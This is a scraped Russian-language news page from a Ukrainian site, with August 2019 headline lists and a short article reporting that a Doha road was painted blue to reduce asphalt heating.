id="post-4769322"><span class="postDate">16:41</span><a class="postTitle" href="https://enovosty.com/news_technology/full/1708-kitaj-zapustil-v-kosmos-novuyu-raketu-video">Китай запустил в космос новую ракету (ВИДЕО)</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4769308"><span class="postDate">11:10</span><a class="postTitle" href="https://enovosty.com/news_technology/full/1708-katastrofa-blizko-kak-temperatura-48c-izmenit-goroda-na-zemle">Катастрофа близко: Как температура +48°C изменит города на Земле?</a><br /><div class="postFields"></div></span></div><div class="cls"></div><hr /><div class="cls"></div><div class='cls'></div><span class='news_date'>16.08.2019 г.</span><br /><div class="post_news"><span id="post-4769182"><span class="postDate">15:00</span><a class="postTitle" href="https://enovosty.com/news_technology/full/1608-vms-ssha-ispravili-problemy-s-dvigatelem-na-svoem-superavianosce-za-13-milliardov-dollarov">ВМС США исправили проблемы с двигателем на своем суперавианосце за 13 миллиардов долларов</a><br /><div class="postFields"></div></span></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/news_technology">Все новости технологий</a></div><div class="wiget simple_line analitika"> <div class="caption"><p style="text-transform: uppercase;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;"><a href="https://enovosty.com/articles">Аналитика</a></p></div><div class="block"><div class="info"><span class="postDate">16.08.2019</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/politika/full/1708-itogi-nedeli-predchuvstvie-reform-rozhdenie-komitetov-i-zaderzhanie-grimchaka">Итоги недели: Предчувствие реформ, рождение комитетов и задержание Гримчака</a></p><div class="cblock"><a href="https://enovosty.com/politika/full/1708-itogi-nedeli-predchuvstvie-reform-rozhdenie-komitetov-i-zaderzhanie-grimchaka"><img width="230" alt="Итоги недели: Предчувствие реформ, рождение комитетов и задержание Гримчака" src="/wp-content/uploads/2019/08/66958.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/politika/full/1708-itogi-nedeli-predchuvstvie-reform-rozhdenie-komitetov-i-zaderzhanie-grimchaka">В Украине задержали заместитель министра МинВОТ Грымчака, депутаты с боем согласовывают комитеты, а погода качает украинцев на бурных августовских качелях, ...</a></span></div><div class="block"><div class="info"><span class="postDate">15.08.2019</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/markets/full/1508-rynok-chastnyx-klinik-perezagruzka">Рынок частных клиник: перезагрузка</a></p><div class="cblock"><a href="https://enovosty.com/markets/full/1508-rynok-chastnyx-klinik-perezagruzka"><img width="230" alt="Рынок частных клиник: перезагрузка" src="/wp-content/uploads/2019/08/dobrobut_boris.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/markets/full/1508-rynok-chastnyx-klinik-perezagruzka">Покупка медицинской сетью «Добробут» клиники «Борис», которая, по сути, была ее конкурентом, может существенно изменить рынок частных медицинских услуг ...</a></span></div><div class="block"><div class="info"><span class="postDate">14.08.2019</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/ekonomika/full/1408-tumannye-perspektivy-ekonomicheskogo-sotrudnichestva-po-motivam-vizita-zelenskogo-v-turciyu">Туманные перспективы экономического сотрудничества. По мотивам визита Зеленского в Турцию</a></p><div class="cblock"><a href="https://enovosty.com/ekonomika/full/1408-tumannye-perspektivy-ekonomicheskogo-sotrudnichestva-po-motivam-vizita-zelenskogo-v-turciyu"><img width="230" alt="Туманные перспективы экономического сотрудничества. По мотивам визита Зеленского в Турцию" src="/wp-content/uploads/2019/08/zelenskiy_erdogan_ed.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/ekonomika/full/1408-tumannye-perspektivy-ekonomicheskogo-sotrudnichestva-po-motivam-vizita-zelenskogo-v-turciyu">Вопреки разного рода политическим прогнозам, визит Зеленского в Турцию мог иметь исключительно экономический смысл. И действительно, определенные перспективы ...</a></span></div></div><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption"><p style="font-weight: 700; font-family: arial,verdana,tahoma; font-size: 12px; text-transform: uppercase; margin: 0; padding: 0; text-align: left;height: 17px;"><a href="https://enovosty.com/news/">Последние новости</a></p></div><div class='cls'></div><span class='news_date'>18.08.2019 г.</span><br /><div class="post_news"> <span id="post-4769441"> <span class="postDate">17:40</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/1808-uchenye-opredelili-luchshij-napitok-dlya-serdechno-sosudistoj-sistemy">Ученые определили лучший напиток для сердечно-сосудистой системы</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769432"> <span class="postDate">16:42</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/1808-spacex-i-nasa-proveli-zrelishhnuyu-sovmestnuyu-trenirovku-foto">SpaceX и NASA провели зрелищную совместную тренировку (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769429"> <span class="postDate">15:55</span> <a class="postTitle" href="https://enovosty.com/news_incidents/full/1808-v-germanii-na-vokzale-muzhchina-ubil-dvoix-lyudej">В Германии на вокзале мужчина убил двоих людей</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769427"> <span class="postDate">15:37</span> <a class="postTitle" href="https://enovosty.com/news_incidents/full/1808-vo-francii-posetitel-restorana-ubil-oficianta-iz-za-togo-chto-emu-dolgo-gotovili-sendvich">Во Франции посетитель ресторана убил официанта из-за того, что ему долго готовили сэндвич</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769422"> <span class="postDate">14:58</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1808-v-xorvatii-samolet-prizemlilsya-posredi-glavnoj-avtomagistrali-video">В Хорватии самолет приземлился посреди главной автомагистрали (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769418"> <span class="postDate">14:21</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/1808-v-katare-asfalt-perekrashivayut-v-sinij-cvet">В Катаре асфальт перекрашивают в синий цвет</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769419"> <span class="postDate">14:14</span> <a class="postTitle" href="https://enovosty.com/news-markets/full/1808-detektivy-nabu-po-delu-rotterdam-ozvuchivayut-nevezhestvennye-tezisy-iz-seriala-sluga-naroda">Детективы НАБУ по делу «Роттердам+» озвучивают невежественные тезисы из сериала «Слуга народа»</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769417"> <span class="postDate">13:58</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/1808-razumkov-verxovnoj-rade-ne-udastsya-bystro-ostanovit-vojnu-na-donbasse">Разумков: Верховной Раде не удастся быстро остановить войну на Донбассе</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769416"> <span class="postDate">13:19</span> <a class="postTitle" href="https://enovosty.com/news_incidents/full/1808-opoznany-pervye-zhertvy-pozhara-v-odesskoj-gostinice">Опознаны первые жертвы пожара в одесской гостинице</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769415"> <span class="postDate">12:59</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1808-prezident-evrokomissii-nuzhdaetsya-v-srochnoj-operacii">Президент Еврокомиссии нуждается в срочной операции</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769414"> <span class="postDate">12:28</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1808-obnarodovan-pervyj-otchet-razvedki-ssha-otnositelno-katastrofy-na-chaes">Обнародован первый отчет разведки США относительно катастрофы на ЧАЭС</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769382"> <span class="postDate">12:00</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/1808-proval-eksperimenta-doroga-iz-solnechnyx-batarej-okazalas-neeffektivnoj">Провал эксперимента: Дорога из солнечных батарей оказалась неэффективной</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769410"> <span class="postDate">11:50</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/1808-v-ukraine-xotyat-vvesti-posemejnoe-deklarirovanie-doxodov">В Украине хотят ввести посемейное декларирование доходов</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769390"> <span class="postDate">11:45</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1808-opublikovan-novyj-rejting-samyx-vliyatelnyx-ukraincev">Опубликован новый рейтинг самых влиятельных украинцев</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769392"> <span class="postDate">11:30</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1808-sankcii-trampa-protiv-irana-i-venesuely-prinesli-rossijskim-neftyanikam-milliard-dollarov">Санкции Трампа против Ирана и Венесуэлы принесли российским нефтяникам миллиард долларов</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769412"> <span class="postDate">11:15</span> <a class="postTitle" href="https://enovosty.com/news_kiev/full/1808-v-chest-dnya-nezavisimosti-ukrainy-kievlyane-poluchat-odnorazovuyu-materialnuyu-pomoshh">В честь Дня независимости Украины киевляне получат одноразовую материальную помощь</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769407"> <span class="postDate">11:04</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1808-rossijskie-voennye-v-krymu-sluchajno-umudrilis-zapustit-raketu-vozdux-zemlya">Российские военные в Крыму случайно умудрились запустить ракету "воздух - земля"</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769405"> <span class="postDate">10:57</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1808-realno-ne-ponimaet-kakoj-vek-na-dvore-v-seti-opublikovali-video-iz-okkupirovannoj-gorlovki-video">"Реально не понимает, какой век на дворе!": в Сети опубликовали видео из оккупированной Горловки (ВИДЕО</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769402"> <span class="postDate">10:50</span> <a class="postTitle" href="https://enovosty.com/uk/auto-ukr/full/1808-pod-kievom-razoblachili-set-podpolnyx-onlajn-kazino-s-serverami-v-rossii">Под Киевом разоблачили сеть подпольных онлайн-казино с серверами в России</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769399"> <span class="postDate">10:39</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1808-ili-ty-i-tvoya-semya-otstanete-ot-menya-ili-mezhdu-nami-vse-koncheno-megan-markl-postavila-zhestkij-ultimatum-princu-garri">«Или ты и твоя семья отстанете от меня, или между нами все кончено!»: Меган Маркл поставила жесткий ультиматум принцу Гарри</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769396"> <span class="postDate">10:33</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1808-v-ukraine-odinokim-lyudyam-razreshat-usynovlyat-detej">В Украине одиноким людям разрешат усыновлять детей</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769394"> <span class="postDate">10:19</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/1808-eksperty-smodelirovali-posledstviya-yadernoj-vojny-mezhdu-ssha-i-rossiej">Эксперты смоделировали последствия ядерной войны между США и Россией</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769387"> <span class="postDate">09:53</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/1808-sostavlen-spisok-samyx-opasnyx-dorog-v-mire-foto">Составлен список самых опасных дорог в мире (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769384"> <span class="postDate">09:49</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1808-velikobritaniya-zayavila-chto-dejstviya-rossii-ugrozhayut-nacbezopasnosti-i-vvela-novye-sankcii">Великобритания заявила, что действия России угрожают нацбезопасности и ввела новые санкции</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769380"> <span class="postDate">09:33</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/1808-oon-izmenenie-klimata-mozhet-vyzvat-medlennyj-globalnyj-prodovolstvennyj-krizis">ООН: Изменение климата может вызвать медленный глобальный продовольственный кризис</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769376"> <span class="postDate">09:28</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1808-konflikt-irana-i-ssha-pozvolyaet-rossii-sozdat-voennyj-forpost-v-regione">Конфликт Ирана и США позволяет России создать военный форпост в регионе</a><br /> </span><div class="postFields"></div></div><div class="cls"></div><hr /><div class="cls"></div><div class='cls'></div><span class='news_date'>17.08.2019 г.</span><br /><div class="post_news"> <span id="post-4769337"> <span class="postDate">19:43</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1708-roditelyam-na-zametku-kakie-novovvedeniya-zhdut-shkolnikov-s-novogo-uchebnogo-goda">Родителям на заметку: какие нововведения ждут школьников с нового учебного года</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769333"> <span class="postDate">18:46</span> <a class="postTitle" href="https://enovosty.com/news_incidents/full/1708-gbr-otkrylo-ugolovnoe-proizvodstvo-iz-za-padeniya-voennogo-mi-2-na-lvovshhine">ГБР открыло уголовное производство из-за падения военного Ми-2 на Львовщине</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769329"> <span class="postDate">17:28</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1708-sinoptik-rasskazala-kogda-v-ukrainu-vozvratitsya-zharkaya-pogoda">Синоптик рассказала, когда в Украину возвратится жаркая погода</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769328"> <span class="postDate">17:18</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1708-polsha-priblizilas-k-bezvizovomu-rezhimu-s-ssha">Польша приблизилась к безвизовому режиму с США</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769322"> <span class="postDate">16:41</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/1708-kitaj-zapustil-v-kosmos-novuyu-raketu-video">Китай запустил в космос новую ракету (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769324"> <span class="postDate">16:23</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/1708-lucenko-gpu-i-sbu-provodyat-specoperaciyu-po-zaderzhaniyu-gruppy-chernyx-registratorov">Луценко: ГПУ и СБУ проводят спецоперацию по задержанию группы «черных» регистраторов</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769323"> <span class="postDate">16:00</span> <a class="postTitle" href="https://enovosty.com/news_incidents/full/1708-vozroslo-kolichestvo-zhertv-pozhara-v-odesskoj-gostinice">Возросло количество жертв пожара в одесской гостинице</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769318"> <span class="postDate">14:59</span> <a class="postTitle" href="https://enovosty.com/news_incidents/full/1708-v-dnepre-vo-vremya-pozhara-proizoshel-obval-travmirovany-spasateli">В Днепре во время пожара произошел обвал: травмированы спасатели</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769317"> <span class="postDate">14:46</span> <a class="postTitle" href="https://enovosty.com/news_incidents/full/1708-pravooxraniteli-ozvuchili-tri-versii-prichin-pozhara-v-gostinice-v-odesse">Правоохранители озвучили три версии причин пожара в гостинице в Одессе</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769316"> <span class="postDate">14:21</span> <a class="postTitle" href="https://enovosty.com/news-markets/full/1708-v-ukrainu-pribyla-missiya-es-po-edinomu-cifrovomu-rynku">В Украину прибыла миссия ЕС по единому цифровому рынку</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769315"> <span class="postDate">13:18</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/1708-taksi-s-marshrutkami-zhdut-novovvedeniya">Такси с маршрутками ждут нововведения</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769314"> <span class="postDate">12:55</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/1708-o-chem-govorit-vstrecha-zelenskogo-so-vselenskim-patriarxom">О чем говорит встреча Зеленского со Вселенским патриархом</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769313"> <span class="postDate">12:25</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/1708-pochemu-vzorvalas-sekretnaya-raketa-putina-i-ustroila-chernobyl-2-zhurnalist">Почему взорвалась секретная ракета Путина и устроила Чернобыль-2, - журналист</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769312"> <span class="postDate">12:22</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/1708-subsidii-pridetsya-vernut-v-byudzhet-u-kogo-iz-ukraincev-zaberut-pomoshh">Субсидии придется вернуть в бюджет: У кого из украинцев заберут помощь</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769311"> <span class="postDate">11:52</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/1708-kak-byt-zdorovym-nazvano-ochen-prostoe-reshenie-spastis-ot-mnogix-problem">Как быть здоровым: Названо очень простое решение спастись от многих проблем</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769309"> <span class="postDate">11:48</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/1708-politolog-nazval-glavnuyu-oshibku-zelenskogo">Политолог назвал главную ошибку Зеленского</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769308"> <span class="postDate">11:10</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/1708-katastrofa-blizko-kak-temperatura-48c-izmenit-goroda-na-zemle">Катастрофа близко: Как температура +48°C изменит города на Земле?</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769306"> <span class="postDate">10:59</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/1708-novyj-troyanskij-kon-putina-chto-nuzhno-delat-sbu">Новый Троянский конь Путина: Что нужно делать СБУ</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769305"> <span class="postDate">10:46</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/1708-ukraina-gotovitsya-shturmovat-mezhdunarodnyj-rynok-vooruzhenij-zloj-odessit">Украина готовится штурмовать международный рынок вооружений, - "Злой одессит"</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769304"> <span class="postDate">10:04</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/1708-pobeg-ot-sbu-izrailskogo-narkokorolya-poyavilos-detalnoe-opisanie-oshibki-specsluzhb">Побег от СБУ израильского "наркокороля". Появилось детальное описание ошибки спецслужб</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769303"> <span class="postDate">10:01</span> <a class="postTitle" href="https://enovosty.com/news-culture/full/1708-iz-zhizni-ushel-izvestnyj-akter">Из жизни ушел известный актер</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769301"> <span class="postDate">09:36</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/1708-otmechen-interesnyj-moment-ot-kotorogo-zavisit-xoroshij-seks">Отмечен интересный момент, от которого зависит хороший секс</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769302"> <span class="postDate">08:40</span>  <a class="postTitle orang" href="https://enovosty.com/news_incidents/full/1708-v-odesskom-otele-proizoshla-tragediya-pogiblo-8-chelovek">В Одесском отеле произошла трагедия, погибло 8 человек</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769300"> <span class="postDate">08:36</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/1708-uchenye-nazvali-nochnye-prichiny-ukazyvayushhie-na-risk-poyavleniya-raka">Ученые назвали "ночные" причины, указывающие на риск появления рака</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769299"> <span class="postDate">08:10</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/1708-vsemu-vinoj-konfuz-pochemu-ne-udalos-arestovat-grymchaka">Всему виной конфуз: Почему не удалось арестовать Грымчака</a><br /> </span><div class="postFields"></div></div><div class="cls"></div><hr /><div class="cls"></div><div class='cls'></div><span class='news_date'>16.08.2019 г.</span><br /><div class="post_news"> <span id="post-4769290"> <span class="postDate">21:37</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/1608-uchenye-rasskazali-pochemu-rabota-v-ofise-vredna-dlya-zdorovya">Ученые рассказали, почему работа в офисе вредна для здоровья</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769287"> <span class="postDate">21:23</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1608-hack-prozorro-prozorro-nabiraet-xakerov-dlya-testirovaniya-sistemy">"Hack Prozorro": Prozorro набирает хакеров для тестирования системы</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769285"> <span class="postDate">20:58</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1608-v-borispole-sbezhal-krupnyj-narkoprestupnik-podrobnosti">В Борисполе сбежал крупный наркопреступник: подробности</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769283"> <span class="postDate">20:36</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1608-proizvodstvo-btr-3-i-btr-4-pod-ugrozoj-sryva-skandal-v-ukroboronprome">Производство БТР-3 и БТР-4 под угрозой срыва: скандал в «Укроборонпроме»</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769281"> <span class="postDate">20:16</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1608-bbc-v-zimbabve-policiya-zhestoko-razognala-mitinguyushhix-video">BBC: В Зимбабве полиция жестоко разогнала митингующих (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769278"> <span class="postDate">19:56</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1608-associated-press-grenlandiya-stolknulas-s-katastroficheskimi-posledstviyami-globalnogo-potepleniya">Associated Press: Гренландия столкнулась с катастрофическими последствиями глобального потепления</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769275"> <span class="postDate">19:33</span> <a class="postTitle" href="https://enovosty.com/news-finance/full/1608-v-ukraine-razmer-zarabotnoj-platy-vyros-na-197">В Украине размер средней заработной платы вырос на 19,7%</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769271"> <span class="postDate">19:08</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1608-92-vsej-voenno-texnicheskoj-pomoshhi-poluchennoj-ukrainoj-iz-za-rubezha-postupilo-iz-ssha">92% всей военно-технической помощи, полученной Украиной из-за рубежа, поступило из США</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4769268"> <span class="postDate">18:56</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1608-v-kamerune-piraty-zaxvatili-ukrainskix-moryakov">В Камеруне пираты захватили в плен украинских моряков</a><br /> </span><div class="postFields"></div></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/">Все новости &raquo;</a></div><div class="links_bal"></div>  </div><div style="width:474px; border:none;" id="center"><div style="width:474px;overflow: visible;" class="wiget simple_category"><style type="text/css" media="screen">@import url(https://enovosty.com/wp-content/themes/eizvestia/css/singlePage.min.css?v=1);</style><style>#center .wiget.singlePost .plot{float:right;margin:5px 0 5px 10px;width:250px}</style><div class="wiget simple singlePost" style="float: left; overflow: hidden; height:auto; border:none; padding:0; margin-bottom:10px;" > <div itemscope itemtype="https://schema.org/NewsArticle" class="post _ga1_on_" style="margin:0; padding:0; " id="post-4769418"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://enovosty.com/news_technology/full/1808-v-katare-asfalt-perekrashivayut-v-sinij-cvet"/><article style="font-size:12pt;"><h1 itemprop="headline" id="postTitle">В Катаре асфальт перекрашивают в синий цвет</h1><div class="breadcrumb"><a href="https://enovosty.com/">Главная</a> <span>&raquo;</span> <a href="https://enovosty.com/news/">Последние новости</a> <span>&raquo;</span> <a href="https://enovosty.com/news/news_technology">Новости технологий</a> <span>&raquo;</span> В Катаре асфальт перекрашивают в синий цвет</div><time datetime="2019-08-18T14:21:16+03:00"><span id="date">Новости технологий, 14:21:16 </span></time><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_technology%2Ffull%2F1808-v-katare-asfalt-perekrashivayut-v-sinij-cvet" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_technology%2Ffull%2F1808-v-katare-asfalt-perekrashivayut-v-sinij-cvet"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span><span class="swp_count">8</span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%92+%D0%9A%D0%B0%D1%82%D0%B0%D1%80%D0%B5+%D0%B0%D1%81%D1%84%D0%B0%D0%BB%D1%8C%D1%82+%D0%BF%D0%B5%D1%80%D0%B5%D0%BA%D1%80%D0%B0%D1%88%D0%B8%D0%B2%D0%B0%D1%8E%D1%82+%D0%B2+%D1%81%D0%B8%D0%BD%D0%B8%D0%B9+%D1%86%D0%B2%D0%B5%D1%82&url=https%3A%2F%2Fenovosty.com%2Fnews_technology%2Ffull%2F1808-v-katare-asfalt-perekrashivayut-v-sinij-cvet&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%92+%D0%9A%D0%B0%D1%82%D0%B0%D1%80%D0%B5+%D0%B0%D1%81%D1%84%D0%B0%D0%BB%D1%8C%D1%82+%D0%BF%D0%B5%D1%80%D0%B5%D0%BA%D1%80%D0%B0%D1%88%D0%B8%D0%B2%D0%B0%D1%8E%D1%82+%D0%B2+%D1%81%D0%B8%D0%BD%D0%B8%D0%B9+%D1%86%D0%B2%D0%B5%D1%82&url=https%3A%2F%2Fenovosty.com%2Fnews_technology%2Ffull%2F1808-v-katare-asfalt-perekrashivayut-v-sinij-cvet&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_technology%2Ffull%2F1808-v-katare-asfalt-perekrashivayut-v-sinij-cvet" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_technology%2Ffull%2F1808-v-katare-asfalt-perekrashivayut-v-sinij-cvet"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail"> <a href="https://enovosty.com/print?printajax=4769418" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div><b><p>В столице Катара одну из автодорог перекрасили в синий цвет. Дорожники пошли на такой шаг для того, чтобы уменьшить температуру нагрева асфальта.</p></b> <div style="text-align:center;"><img width="460" height="263" src="https://enovosty.com/wp-content/uploads/2019/08/630_360_1566113819-897-460x263.jpg" class="attachment-news-image size-news-image wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2019/08/630_360_1566113819-897.jpg 460w, https://enovosty.com/wp-content/uploads/2019/08/630_360_1566113819-897-112x64.jpg 112w, https://enovosty.com/wp-content/uploads/2019/08/630_360_1566113819-897-300x172.jpg 300w" sizes="(max-width: 460px) 100vw, 460px" /></div> <p>В Дохе, столице <a class="tag" href="https://enovosty.com/tag/katar" target="_blank">Катар</a>а, появилась синяя автомобильная дорога. Об этом сообщают местные СМИ, информирует <a class="inform" href="https://enovosty.com/news">enovosty.com/news</a>.</p><p>Идея перекрасить <a class="tag" href="https://enovosty.com/tag/asfalt" target="_blank">асфальт</a> возникла у сотрудников Управления по выполнению общественных работ. Их поддержали японские ученые. Проект предполагал покраску дороги с целью снизить температуру нагрева на целых 15-20 градусов.</p><p>Инженер Саада-аль-Досари заявил, что работникам удалось добиться желаемого эффекта. По его словам, ранее этот участок дороги на 20 градусов превышал температуру среды. Связано это с тем, что черный цвет сильно впитывает и выпускает тепло.</p><p>Руководители проекта также отметили, что синий цвет – идеален для дорог. Он не только позволяет снизить температуру асфальта, но и очень благотворно влияет на человеческий глаз.</p><p class="readlink"><strong>Читайте:</strong> <a 